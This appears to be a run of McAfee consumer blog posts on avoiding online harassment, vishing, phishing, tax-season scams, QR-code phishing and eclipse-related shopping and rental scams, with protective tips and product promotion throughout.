• Cyberstalking — Collecting info and tracking the whereabouts of a victim in a threatening way.
• Identity Theft — Stealing a victim’s accounts or posting messages posing as them online. 

It includes other acts, such as: 

• Name-calling. 
• Spreading false rumors. 
• Sending explicit images or messages. 
• Threats of physical harm. 

In practice, the results can get ugly. Scanning press releases from various state attorneys general, you’ll find unflinching accounts of harassment. Like a targeted, three-year cyberstalking campaign against a victim and that person’s parents, coworkers, siblings, and court-mandated professionals.^v Another, where the harasser attempted to defame his victim through a fake LinkedIn profile — and further doxed his victim by publicly posting source code the victim had written worth millions of dollars.^vi 

All of this serves as a reminder. Harassment can quickly turn into a crime. 

How to protect yourself from harassment on social media. 

The unfortunate fact remains that you can’t prevent social media harassment. Some people simply find themselves driven to do it. You can take several steps to shield yourself from attackers and deny them the info they need to fuel their attacks. 

Secure your accounts. 

Account security should be a high priority for you, your loved ones, and anyone else. That’s especially true during periods of harassment. Every account you have should be secured with a complex password — at least 12 to 14 characters long, with numbers, capital letters, lowercase letters, and symbols. And with two-factor authentication. 

Two-factor authentication is especially important when it comes to account security. The reason is simple: a lot of harassers are tech-savvy, and enjoy taking over a victim’s account to make offensive comments in their name and damage their reputation. 

Two-factor authentication prevents account takeovers like this. It requires a user to know the password and username for an account, along with another way they can prove they are who they say they are. Often that involves a code sent to their smartphone that they can use to verify their identity. At McAfee, we recommend you use two-factor authentication on any account that offers it. 

Control who can follow you. 

Social media platforms offer plenty of ways you can lock down your privacy, even as you remain “social” on them to some degree. Our Social Privacy Manager can help you be as private as you like. It helps you adjust more than 100 privacy settings across your social media accounts in only a few clicks, so your personal info is only visible to the people you want to share it with. By making yourself more private, you deny a potential harasser an important source of info about you, in addition to your friends, family, and life overall. 

Limit what you share online. 

Limit how much info you share about yourself on social media websites. Addresses, phone numbers, and locations shouldn’t be shared in posts and shouldn’t be included in biographies. Attackers can use this type of info to make false threats and, in some cases, falsify crimes to elicit a police response — this is a technique called “SWATTING” and it’s quite serious.^vii  

In some instances, harassers gather info about their victims on data brokers or “people finder” sites. Some of this info can get pretty detailed, and these sites will sell it to anyone. You can clean up that info, however. Our Personal Data Cleanup scans data broker sites and shows you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites — or remove it for you, depending on your plan. 

Harassed on social media? Here are the steps to take. 

Report the harassment to the social media platform. 

If you find yourself targeted, don’t respond. That’s what the harasser wants. Use your social media platform’s tools to block and then report the harasser. Many platforms have web pages dedicated to harassment that walk you through the process.  

Report harassment to the authorities.  

First off, if you feel that you are in immediate danger, contact your local authorities for help. 

In many cases, harassment is illegal. Slander, threats, damage to your professional reputation, doxing, and many of the examples mentioned earlier can amount to a crime. There are options for victims, legally speaking. If you feel a harassment campaign has crossed the line, then it’s time to contact the authorities. Bring proof of harassment. Take screenshots of everything and submit them as part of your complaint. 

Talk with trusted family members and friends. 

We’ve seen just how damaging and painful harassment can be. Let trusted people in your life know what’s happening. Lean on them for support. And have them help you find any resources you might need in the wake of harassment, such as counseling or even legal assistance. You might find this tough to do, yet realize that you’re not at fault here. Any ugliness you’re dealing with comes from the hands of a harasser. Not yours. Close family and friends will recognize this.

[i] https://www.adl.org/resources/report/online-hate-and-harassment-american-experience-2023 

[ii] https://www.adl.org/resources/report/online-hate-and-harassment-american-experience-2023 

[iii] https://www.pewresearch.org/internet/2021/01/13/the-state-of-online-harassment/ 

[iv] https://media.mcafeeassets.com/content/dam/npcld/ecommerce/en-us/docs/reports/rp-cyberbullying-in-plain-sight-2022-global.pdf 

[v] https://www.justice.gov/usao-wdwa/pr/everett-man-indicted-cyberstalking-and-threatening-former-romantic-partner 

[vi] https://www.justice.gov/usao-ednc/pr/federal-jury-convicts-cyberstalker-who-used-fake-linkedin-profile-harassment-campaign 

[vii] https://www.theguardian.com/technology/2016/apr/15/swatting-law-teens-anonymous-prank-call-police 

 

The post How to Protect Yourself From Social Media Harassment appeared first on McAfee Blog.

A Finance Journalist Fell Victim to a $50K Vishing Scam – Are You Also at Risk?

In a world where digital communication dominates, the art of scamming has evolved into a sophisticated game of deception. A recent story in The Cut featured a seasoned personal finance journalist falling prey to an Amazon scam call and being duped out of a staggering $50,000. The story serves as a stark reminder that anyone, regardless of their expertise or background, can become a victim of vishing. Short for “voice phishing,” vishing is a form of cybercrime where scammers use phone calls to deceive individuals into revealing personal or financial information. 

Contrary to common belief, it’s not just the elderly or technologically naive who fall victim to such schemes. One national survey found that only 15% of Gen Z and 20% of millennials express concern about falling victim to financial fraud. However, the Federal Trade Commission paints a different picture, indicating that younger adults are over four times more likely to report losing money to fraud than older adults. This dissonance highlights the need for heightened awareness and education across all age groups. 

Types of vishing 

Vishing is a form of fraud that exploits the trust we place in phone calls. It operates through various strategies, all aimed at tricking victims. For example, wardialing involves automated systems dialing phone numbers to find vulnerable targets. VoIP, or Voice over Internet Protocol, allows scammers to make calls over the internet, often making it harder to trace them.  

Caller ID spoofing is another tactic where scammers manipulate the caller ID to display a trusted or familiar number, tricking recipients into answering. These techniques create a false sense of legitimacy, making it difficult for individuals to distinguish between real and fraudulent calls.  

Why vishing has gotten more effective  

Vishing exploits trust and naivety to obtain sensitive information or conduct unauthorized transactions. Humans have always been vulnerable to scams, but the abundance of personal data available on the dark web, obtained from various data breaches and leaks, has significantly heightened the threat. For example, LinkedIn experienced a data breach in 2021 that exposed data from 700 million users on a dark web forum. 

A data breach like that presents scammers with a treasure trove of details about potential victims, enabling them to personalize their attacks with alarming precision. By incorporating specific details gleaned from these data sources, scammers can craft convincing narratives and establish a false sense of trust and credibility with their targets. Consequently, even individuals who exercise caution in safeguarding their personal information may find themselves vulnerable to vishing scams.  

How to mitigate the threat 

As a result, individuals must remain vigilant and adopt comprehensive security practices. Familiarizing oneself with the telltale signs of a scam call is the first line of defense. Be wary of:  

• Unsolicited calls: Be cautious of unexpected phone calls, especially if they request personal or financial information. 
• Requests for sensitive information: Legitimate organizations typically don’t ask for sensitive information like Social Security numbers, passwords, or bank account details over the phone. 
• Pressure tactics: Scammers often create a sense of urgency or fear to prompt immediate action, such as claiming your account is in danger or you’ll face legal consequences. 
• Caller ID inconsistencies: If the caller ID seems suspicious or doesn’t match the organization they claim to represent, it could be a sign of spoofing.  
• Unusual requests or offers: Be suspicious of unusual requests, such as asking you to pay fees upfront to claim a prize or offering unsolicited services or products. 

If an unsolicited call seems suspicious, hang up the phone. Verify the caller’s legitimacy through independent channels, such as contacting the organization directly using a trusted phone number. In addition to recognizing signs of scam calls, implementing call-blocking technologies or screening unknown numbers can reduce exposure to potential scams. McAfee Mobile Security’s call blocker feature can be employed to diminish the volume of incoming calls. 

The alarming reality is that vishing knows no bounds and can affect any age or demographic. The unfortunate ordeal of the seasoned journalist losing $50,000 serves as a sobering reminder of the perils lurking behind seemingly innocuous phone calls. Vishing demands vigilance and awareness. Security software and apps can significantly increase the overall security of your phone by detecting and preventing various threats, such as malware, phishing attempts, and unauthorized access to sensitive information. 

By adopting proactive measures, we can fortify our defenses against vishing scams and safeguard our financial well-being. Stay informed, stay vigilant, and stay protected. 

 

The post A Finance Journalist Fell Victim to a $50K Vishing Scam – Are You Also at Risk? appeared first on McAfee Blog.

Stay Cyber Savvy: Your 5-Step Guide to Outsmarting Phishing Scams

In today’s digital landscape, distinguishing between legitimate communications and phishing attempts can feel like navigating a labyrinth blindfolded. Phishing is a deceptive tactic where cybercriminals use fraudulent emails, texts, or messages to trick individuals into revealing sensitive information or clicking on malicious links. And let’s not forget its crafty sibling, “smishing” – the text message iteration of this digital charade. 

Now that most brands and even government agencies communicate with consumers via text or email, it’s hard to know whether a message is legit or not. Consider the United States Postal Service, which should be solely focused on dependable package delivery, yet is frequently tasked with warning individuals against clicking on links from unsolicited messages impersonating the postal service. 

Many people are concerned that they’ll unwittingly open an official-looking email or text only to become victims of a scam. Fortunately, there are steps you can take to educate yourself and establish safeguards against phishing and smishing attempts. 

Here are five steps for staying cyber savvy and protecting yourself from phishing scams: 

1. Educate yourself and your loved ones: Verizon’s Data Breach Investigations Report found that phishing attacks have surged and now account for 36% of attacks. Yet, many Americans still aren’t aware of what phishing is and that they might be at risk. Ask your family members and friends if they know what phishing and smishing are. If not, share what you have learned about it so that they, too, can become aware of the risks. 
2. Decode deception: Avoiding scams entails recognizing their characteristics and distinguishing them from legitimate communications. For scammers, these attacks are often a numbers game, sending mass messages to as many people as possible. Many phishing texts will have poor grammar or spelling and may not even address you by your first name. Legitimate emails typically address recipients by their first name and demonstrate proper grammar and spelling.
3. Beware of urgency: Since scammers are in a hurry to send as many messages and get as many clicks as possible, the communications often sound urgent — “Act NOW before we disable your account.” Take the time to slow down and consider whether the urgency of the message aligns with your usual interactions with the organization or service provider before taking any action.
4. Spot suspicious senders: Another sign of fraud can often be found in irregularities in the sender’s email or phone number. Legitimate banks typically use a consistent 5-digit number for their messages, while scammers might use a full 10-digit phone number or switch between different numbers. In emails, the sender’s email address may appear nonsensical or unrelated to the purported sender, signaling potential fraud.
5. Use multifactor authentication: Multifactor authentication (MFA) lets users “easily authenticate to online services” by replacing password-only logins with more secure logins. Turning on multifactor authentication means that, even if a scammer steals your password, they won’t be able to get into your account without something like an authenticator app or fingerprint that only you have. 

In a world where even simple emails and text messages can harbor malevolent intent, it’s crucial to fortify yourself with knowledge and vigilance. Using multifactor authentication and learning how to spot scam messages will help you avoid scams. If you want additional protection, our AI-powered Scam Protection scans text messages and alerts users or filters out the text if it detects a scam link. The software also blocks links from scam emails, texts, and social media messages in the event you accidentally click one. It’s not always easy to spot phishing scams, but we can help by providing that first — and second line of defense.  

The post Stay Cyber Savvy: Your 5-Step Guide to Outsmarting Phishing Scams appeared first on McAfee Blog.

The Top Tax Scams of 2024

While last-minute tax filers stare down the clock, scammers look for easy pickings. Tax scams are in full swing as April 15^th approaches, and we have a rundown of the top ones making the rounds this year.

For starters, the stakes this year remain the same as ever. Scammers are taking advantage of the stress and uncertainty that comes with tax season as they target people’s personal info, money, or both. Their avenues of attack remain the same as well, via email, texts, direct messages, and the phone.

Yet there’s a new wrinkle this year. Scammers have tapped into AI tools that make their scams look and feel far more sophisticated than ever.

We saw the first stirrings of AI-driven scams last year as AI tools first entered the marketplace. This year, AI-driven scams feature more and more in the landscape of threats. Scammers use them to generate images, write copy, and build websites in a fraction of the time that it once took. While they still make some of the design and writing mistakes they’ve made in the past, they make far fewer of them.

Examples of tax scams we’ve spotted this year.

We have a couple of tax scams to share from the many we’ve uncovered. The first one involves a popular brand of tax software here in the U.S.

Example of a scammer email

At first blush, this bogus email looks pretty legit. At first. The layout, photograph, and link all look like standard fare for an email. Though looking more closely, you can spot several AI fingerprints all over it.

For one, big brands like TurboTax have writers, editors, and reviewers who comb over copy before it gets approved for release. Here, the headline breaks a pretty standard formatting rule. In “headline case” writing, the “with” should be lowercase. Sure, mistakes get made, and this might be one example. Yet the problems go deeper than that.

Read the fine print. You’ll see that the grammar is off. The paragraph overall has a broken feel to it. You’ll also see that the copy mentions “market leader” twice — and awkwardly so. And what company mentions its competitors in an email like this? They’re not out to boost competitors.

Lastly, the email spells out the company’s name wrong in the fine print. It’s “TurboTax,” not “Turbo Tax with License Code.” All of this points to an obvious fake. But only by looking closely at it. It’s as if the scammers prompted an AI chatbot with “Describe what TurboTax is” and got this as a response.

Granted, that represents an example of rather sloppy work. The next example looks more convincing. This time, the scammers impersonate the IRS:

Example of a scammer website

We discovered this fake IRS site when our McAfee Labs team investigated a link sent in an email. The bait is the promise of getting a tax ID number for a business or organization. The hook is this bogus site designed to harvest personal and business info.

If you’ve visited the IRS site recently, you’ll recognize the look and feel of an IRS webpage quickly. It seems familiar enough, yet once again a closer look reveals a few things.

First, a small grammatical error rears its head in the copy. The term “setup” is a noun, yet the copy uses it as a verb. It should read “set up” instead. Granted, this is a common error. Many sites make it, yet it’s a red flag nonetheless. Next, the contact method in the top right raises yet another. Contact “an EIN expert” via email during set hours? Set hours are for phone calls, not email.

We omitted the final telltale sign — the URL. It was clearly a fake and not the official irs.gov address.

In all, it shows just how cagey tax scammers can be today. Particularly with AI. It puts a fresh look on some old tactics, making scams tougher to spot.

Now, onto our top tax scams for 2024.

Sketchy email attachments — the five most popular types.

This classic is back. Scammers spread all manner of malware with email attachments. One example: spyware that steals info as you type usernames and passwords as you log into your accounts. Another: ransomware that holds the data on your device hostage until you pay. Maybe. The list goes on, yet scammers always try to package it up in a way that looks legit.

One way they pull that off is with a phony tax document bundled up in a .pdf document. In fact, the .pdf format marks the number one file type that hackers and scammers use in their attacks. By our count, it tops the number two file type by a ratio of roughly 6 to 1.

Here are the top five file types used by scammers and hackers:

1. .pdf
2. .exe
3. .zip
4. .html
5. .text

What makes the .pdf format so popular? People trust it. It gets commonly used in business, and many legitimate tax forms come in that format. However, it also offers a versatile platform for exploits. Hackers and scammers can embed malicious links and content within them. So clicking what’s inside that .pdf doc can lead to trouble, say in the form of a malicious website designed to steal personal info.

Starting in the second half of last year, we noted a spike in malicious attachments that used the .pdf format. Another reason that makes .pdf files so popular, email filters tend to focus on other file types like the executable .exe format. So, a .pdf has a better shot at slipping through.

Our advice:

As always, strong antivirus software can detect and protect you from malicious email attachments. Our Next-gen Threat Protection found in all our McAfee+ plans once again proves itself as a top option for antivirus. Results from the independent lab AV-TEST in December 2023 saw it block 100% of entirely new malware attacks in real-world testing. It likewise scored 100% against malware discovered in the previous four weeks. In all, it received the highest marks for protection, performance, and usability — earning it the AV-TEST Top Product certification.

Tax time phishing scams.

Phishing scams crop up in plenty of places and take plenty of forms. As in years past, we see scammers cranking up their bogus texts, direct messages, and emails. They all follow the tax season theme, yet they take different approaches to roping in victims. Some include:

• Attachments with phony tax documents, like W2 and 1099 forms.
• Scam texts that alert the taxpayer of an unclaimed refund.
• Imposter schemes, like social media messages from people who pose as legitimate IRS agents.
• Fake offers for tax prep software (like the TurboTax example above).

Additionally, many phishing attacks point people to malicious websites — once again that steal personal info. We’ve seen a spike in malicious tax-related URLs starting in the second half of last year as well.

Our advice:

You can absolutely protect yourself from phishing scams. Now with the help of AI. McAfee Scam Protection detects suspicious URLs with AI before they’re opened or clicked on. This takes the guesswork out of those sometimes convincing-looking messages by letting you know if they’re fakes. If you accidentally click or tap on a suspicious link in a text, email, social media, or browser search, it blocks the scam site from loading. You’ll find McAfee Scam Protection across our McAfee+ plans.

Fake charity scams also crop up this time of year.

Whether it’s for natural disaster aid, aiding refugees in war-torn regions, or even protecting animals and pets, scammers set up phony charities with the aim of pulling heartstrings. And then stealing money as a result.

Scammers reach out with the usual methods, by email, text, direct message, and sometimes phone calls as well. They all share one thing in common. They all give potential victims a chance to support a cause that they care for and get a tax credit in return. Yet with these scams, the charity doesn’t exist. Instead, money and personal info end up in the hands of scammers.

Our advice:

Yet you have several ways you can spot a fake charity. For one, the message often has a pressing, almost alarming, tone. One that urges you to “act now.” Before acting, take a moment. Research the charity. See how long they’ve been in operation, how they put their funds to work, and who truly benefits from them.

Likewise, note that some charities pass along more money to their beneficiaries than others. Generally, most reputable organizations only keep 25% or less of their funds for operations, while some less-than-reputable organizations keep up to 95% of funds, leaving only 5% for advancing the cause they advocate. In the U.S., the Federal Trade Commission (FTC) has a site full of resources so that you can make your donation truly count. Resources like Charity Watch and Charity Navigator, along with the BBB’s Wise Giving Alliance can also help you identify the best charities.

Keep an ear out for scam calls.

Scammers like to pick up the phone too. A popular form of attack involves “the call from the IRS.” Typically, a recorded message notifies the recipient that they owe money. And because scammers know just how jarring a call from the IRS can be, they apply heavy pressure in the message.

In the past, we’ve heard messages that threatened fines, jail time, and revoking driver’s licenses. They’ve mentioned the police and other law enforcement agents in them as well, just to turn up the heat.

Now with AI, scammers can create robocalls that sound highly realistic in only moments of time. It’s as simple as writing a few lines of a script, feeding it into an AI tool, and then generating an audio file. No need for another person to record the message. AI takes care of it all.

Our advice:

The best way you can avoid falling for this scam is by knowing what the IRS will and will not do when they contact you. From the irs.gov website, the IRS will not:

• Initiate contact with taxpayers by email, text messages, or social media channels to request personal or financial info.
• Call to demand immediate payment using a specific payment method such as a prepaid debit card, gift card, or wire transfer. Generally, the IRS will first mail a bill to any taxpayer who owes taxes.
• Demand that you pay taxes without the opportunity to question or appeal the amount they say you owe. You should also be advised of your rights as a taxpayer.
• Threaten to bring in local police, immigration officers, or other law enforcement officers to have you arrested for not paying. The IRS also can’t revoke your driver’s license, business license, or immigration status. Threats like these are common tactics scam artists use to trick victims into buying into their schemes.

Lastly, also know that the IRS is here to help. The agency offers a full help page with online resources, along with several ways you can contact the IRS for help. If you have any questions about a notification that you received, contact them.

Even more protection from tax-time scams…

While scammers have a wealth of tools available to them, you have one tool that protects you from all kinds of threats. Comprehensive online protection software like McAfee+ offers yet more ways to steer clear of tax scams.

In addition to the antivirus and scam protection features we mentioned, it can make you more private on social media, which can prevent scammers from profiling you. It can also remove your personal info from the data broker sites scammers use to contact their victims. (Granted, scammers have to get your contact info from somewhere, and these sites offer that info, plus much more.) Also, a VPN can help you connect and file your taxes even more securely, so what you do stays private.

And if the unfortunate happens, our identity theft coverage can help you recover. It provides $2 million in identity theft coverage and a licensed recovery expert who can help restore your identity.

Yes, we’re seeing plenty of old scams with new twists this year. Yet the same ways you can protect yourself from them only get better and better.

The post The Top Tax Scams of 2024 appeared first on McAfee Blog.

How to Steer Clear of Tax Season Scams

It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.

So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.

In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.

Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.

Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are concerned about how much they might owe or are predicting how much they’ll get back on their tax refund, and scammers play to both of these emotions. So, as hundreds of taxpayers are waiting for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:

File before cybercriminals do it for you. The easiest defense you can take against tax season schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.

Keep an eye on your credit and your identity. Keeping tabs on your credit report and knowing if your personal information has been compromised in some way can help prevent tax fraud. Together, they can let you know if someone has stolen your identity or if you have personal info on the dark web that could lead to identity theft.

• Our credit monitoring service can keep an eye on changes to your credit score, report, and accounts with timely notifications and guidance so you can take action to tackle identity theft.
• Our identity monitoring service checks the dark web for your personal info, including email, government IDs, credit card and bank account info, and more—then provides alerts if your data is found on the dark web, an average of 10 months ahead of similar services.​
• Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double-check their legitimacy with a manager or the security department before you respond. Remember: the IRS will not initiate contact with taxpayers by email, text messages, or social media channels to request personal or financial info. So someone contacts you that way, ignore the message.

Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.

Protect yourself from scam messages. Scammers also send links to scam sites via texts, social media messages, and email. McAfee Scam Protection can help you spot if the message you got is a fake. It uses AI technology that automatically detects links to scam URLs. If you accidentally click, don’t worry, it can block risky sites if you do.

Clean up your personal info online. Crooks and scammers have to find you before they can contact you. After all, they need to get your phone number or email from somewhere. Sometimes, that’s from “people finder” and online data brokers that gather and sell personal info to any buyer. Including crooks. McAfee Personal Data Cleanup can remove your personal info from the data broker sites scammers use to contact their victims.

Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blog.

How to Protect Against New Types of Scams Like QR Phishing

Four in ten Americans say they use peer-to-peer payment services, like Venmo, PayPal, or Apple Pay, at least once a month. These platforms have made it even easier to send money by adding QR codes that people can quickly scan to pull up someone’s profile and complete a payment. Two-thirds of restaurants have started including QR codes on tables to access menus. Scanning QR codes has become a normal, convenient way to exchange money or information. 

Unfortunately, scammers are always looking for ways to take advantage of moments when people are primed to part with their money. The Federal Trade Commission is warning that scammers now use QR codes to hide harmful links to steal personal information. This new type of phishing attack, called “quishing,” highlights how scamming methods are constantly changing. In response, artificial intelligence (AI) is becoming an even more crucial part of defending against scammers. 

Fortify your defenses against new methods of attack 

To protect yourself against phishing attacks, it’s crucial to remain vigilant and employ proactive measures. Make sure to scrutinize all incoming emails, text messages, or social media communications for any signs of suspicious or unsolicited requests, especially those urging immediate action or requesting sensitive information.  

Avoid clicking links, downloading attachments, or scanning QR codes from unknown or untrusted sources. Check the legitimacy of the sender by cross-referencing contact information with official sources or contacting the organization directly through trusted channels. 

Before accepting where a QR code is going to take you, carefully examine the associated URL. Verify its authenticity by scrutinizing for any discrepancies, such as misspellings or altered characters, especially if it resembles a familiar URL. 

Safeguard your mobile device and accounts by regularly updating the operating system. Additionally, bolster the security of your online accounts by implementing robust passwords and integrating multi-factor authentication measures to thwart unauthorized access. 

Use AI to fight fire with fire  

As fraudsters continually evolve their tactics, distinguishing between what’s real and what’s fake becomes increasingly challenging. However, there is formidable technology available to safeguard against their schemes. AI can analyze vast amounts of data in real-time to detect patterns and anomalies indicative of fraudulent behavior. By continuously learning from new data and adapting algorithms, AI can stay ahead of evolving fraud tactics. 

The McAfee+ suite of identity and privacy protections uses AI for identity protection, transaction monitoring, credit monitoring, and proactive Scam Protection to keep you safe from even the most sophisticated scam attempts. Scam Protection employs AI technology to block risky sites, serving as a secondary defense against accidental clicks on spam links. This ensures that even after being tricked into clicking, your device won’t open the fraudulent site. 

Don’t leave your digital defenses to chance. See for yourself what advanced security looks like today. 

The post How to Protect Against New Types of Scams Like QR Phishing appeared first on McAfee Blog.

How to Avoid Solar Eclipse Scams

Scammers are turning a buck on the eclipse. A rash of eclipse scams have appeared online, many involving the sale of unsafe viewers and solar eclipse glasses. 

With the eclipse making its way from Texas, through the Midwest, and up through the Northeast on April 8th, people increasingly want to get their hands on equipment to view it. And as it always is when it comes to big events and scarcity, scammers rush in. 

A map of the eclipse path – GreatAmericanEclipse.com

As such, the Better Business Bureau (BBB) issued a consumer warning about the sale of cheap, knockoff solar eclipse glasses.i Worse yet, viewing the eclipse with these bogus glasses can harm your eyes. So as if getting ripped off wasn’t bad enough, this scam can damage a person’s vision. 

Here, we’ll put you on the path to buying a safe set of viewing glasses — and offer several ways you can avoid buying knockoffs from a scammer. 

Where can I buy sunglasses for the eclipse? 

The American Astronomical Society has a list you’ll find helpful. With a visit to their page dedicated to suppliers of solar filters and viewers, you’ll have your pick of places where you can purchase. The list is long, featuring a mix of online and retail outlets where you can get safe, approved gear for viewing. 

Also, check out the society’s page on safe viewing for the eclipse. It covers what you need to know to view the eclipse safely, from how to use a viewer, the ISO 12312-2 standard that all viewers must adhere to, and how to properly clean viewers so they remain safe. 

Tips for buying safely for the eclipse. 

How do so many scams ramp up so quickly for such a highly specific event? It doesn’t take much to spin up e-commerce sites and pump out ads nowadays. Thanks to a host of low-cost and easy-to-use tools for publishing and advertising online, scammers of all sizes can create bogus shopping experiences much more quickly than ever.  

And as we’ve discussed so often in our blogs as of late, scams look and feel increasingly sophisticated today. AI gives scammers ready access to design tools, audio and video creation tools, copywriting bots, and more. Then add in the ease with which scammers can post their ads in search and on social media, and they have quick and ready ways of reaching potential victims. 

Even so, a few extra steps and a bit of caution can help you avoid these scams. 

1. Stick with known, legitimate retailers online. 

This is a great piece of advice to start with. Directly typing in the correct address for online stores and retailers is a prime way to avoid scammers online. In the case of retailers that you don’t know much about, the BBB asks shoppers to do their research. Ensure that the retailer has a good reputation. The BBB makes that easier with a listing of retailers you can search by typing in their name.  

2. Research new sellers for their history and reviews. 

Never heard of that retailer before? See when they launched their website. A relatively new site might be a sign that it’s part of a scam. 

A quick visit to the ICANN (Internet Corporation for Assigned Names and Numbers) website can show you certain background info for any website you type in. Given how quickly and easily scammers can register and launch a website, this kind of info can help you sniff out a scam.   

Of course, it might also indicate a new business that’s entirely legitimate, so a little more digging is called for. That’s where reviews come in. Aside from the resources listed above, a simple web search of “[company name] reviews” or “[company name] scam” can help you discover if the retailer is legit. 

3. Look for the lock icon in your browser when you shop. 

Secure websites begin their addresses with “https,” not just “http.” That extra “s” stands for “secure,” which means that it uses a secure protocol for transmitting sensitive info like passwords, credit card numbers, and the like over the internet. It often appears as a little padlock icon in the address bar of your browser, so double-check for that. If you don’t see that it’s secure, it’s best to avoid making purchases on that website. 

4. Pay with a credit card instead of your debit card. 

Credit cards offer fraud protections that debit cards don’t. Another key difference: when fraud occurs with a debit card, you fight to get your money back — it’s gone straight out of your account. With a credit card, the issuer fights to get their money back. They’re the ones who take the financial hit. 

Additionally, in the U.S., the Fair Credit Billing Act offers the public protection against fraudulent charges on credit cards. The act gives citizens the power to dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Note that many credit card companies have their own policies that improve upon the Fair Credit Billing Act as well. However, debit cards aren’t afforded the same protection under the Act. Avoid using a debit card while shopping online and use your credit card instead. 

5. Protect your devices for shopping. 

A complete suite of online protection software like McAfee+ can offer layers of extra security while you shop. It includes scam protection that can block malicious and questionable links that might lead you down the road to malware or a phishing scam — along with a password manager that can create and securely store strong, unique passwords. 

Booking a place to see the eclipse? Here’s an online rental scam you should know about. 

If you have some last-minute bookings and travel in your plans for the eclipse, look out for online rental fraud scams. With a few images cobbled together from the internet, scammers list phony properties and seek to get paid outside legitimate rental platforms — leaving you short of funds and short of a place to stay when you finally arrive. 

You can avoid these scams rather easily. Trust a trusted platform. Book your vacation rental through a reputable outlet. Vacation rental platforms like Airbnb and VRBO have policies and processes in place that protect renters from scammers.  

You have several other ways you can avoid booking scams …  

First, look at the listing.  

Do the photos look grainy or like they came from a magazine? Do a reverse image search on the photo and see what comes up. It might be a piece of stock photography designed to trick you into thinking it was taken at an actual property for rent. Also, read the reviews for the property. Listings with no reviews are a red flag.  

Only communicate on the platform.  

The moment a host asks to communicate outside of the platform is another red flag. Scammers will try to lure you off the platform where they can request payment in forms that are difficult to recover or trace after you realize you’ve been scammed. That includes methods such as certified checks, money transfers like Western Union, and online payment apps like Zelle. Generally, when that money is gone, it’s gone for good. 

Only pay on the platform.  

Likewise, paying for your rental outside the platform might also go against the terms of service, as in the case of Airbnb. Or, as with VRBO, paying outside the platform voids their “Book with Confidence Guarantee,” which offers you certain protections. Use the platform to pay and use a credit card when you do. In the U.S., the Fair Credit Billing Act allows you to dispute charges. Additionally, some credit cards offer their own anti-fraud protections that can help you dispute a billing.   

Shop for the eclipse with extra care. 

With big events comes scarcity. Postseason sports and merch. Holiday shopping and hot gifts. Vacation time and rentals at popular destinations. Scammers love this combination. With people in a rush to buy or book, scammers take advantage. As we now see, we can add eclipses to that list, just as we saw with the 2017 eclipse. 

In addition to the advice above, take your time and ensure a safe purchase. Given that variants of this scam involve phony, unsafe viewing glasses, take the extra care that your vision absolutely deserves. Go with a reputable retailer with ISO-approved lenses. 

 

The post How to Avoid Solar Eclipse Scams appeared first on McAfee Blog.

The Four Rs of Personal Mobile Security

Smartphones have enabled a whole new digital world, where apps are gateways to just about any service imaginable. However, like many technological developments, mobile app proliferation can be a bit of a two-edged sword. A report analyzing more than 1 billion smartphone transactions found 45,000 malicious mobile apps, many of which were in the gaming category.  

From ad fraud to taking advantage of embedded system security issues, fraudsters are consistently targeting smartphone apps. The trouble is that it’s not always immediately clear which apps pose a threat in a world where one in 36 mobile apps are considered high-risk. 

These security concerns require a proactive approach with the ability to spot the signs of fraud or malice so that those apps can be avoided from the get-go. That’s where the four Rs of personal mobile security come into play.  

Review 

Staying informed about common scam tactics and emerging threats through reliable cybersecurity resources can empower consumers to make informed decisions and recognize potential risks more effectively. Our annual Consumer Mobile Threat Report always gives up-to-date information about the cyberattack landscape.  

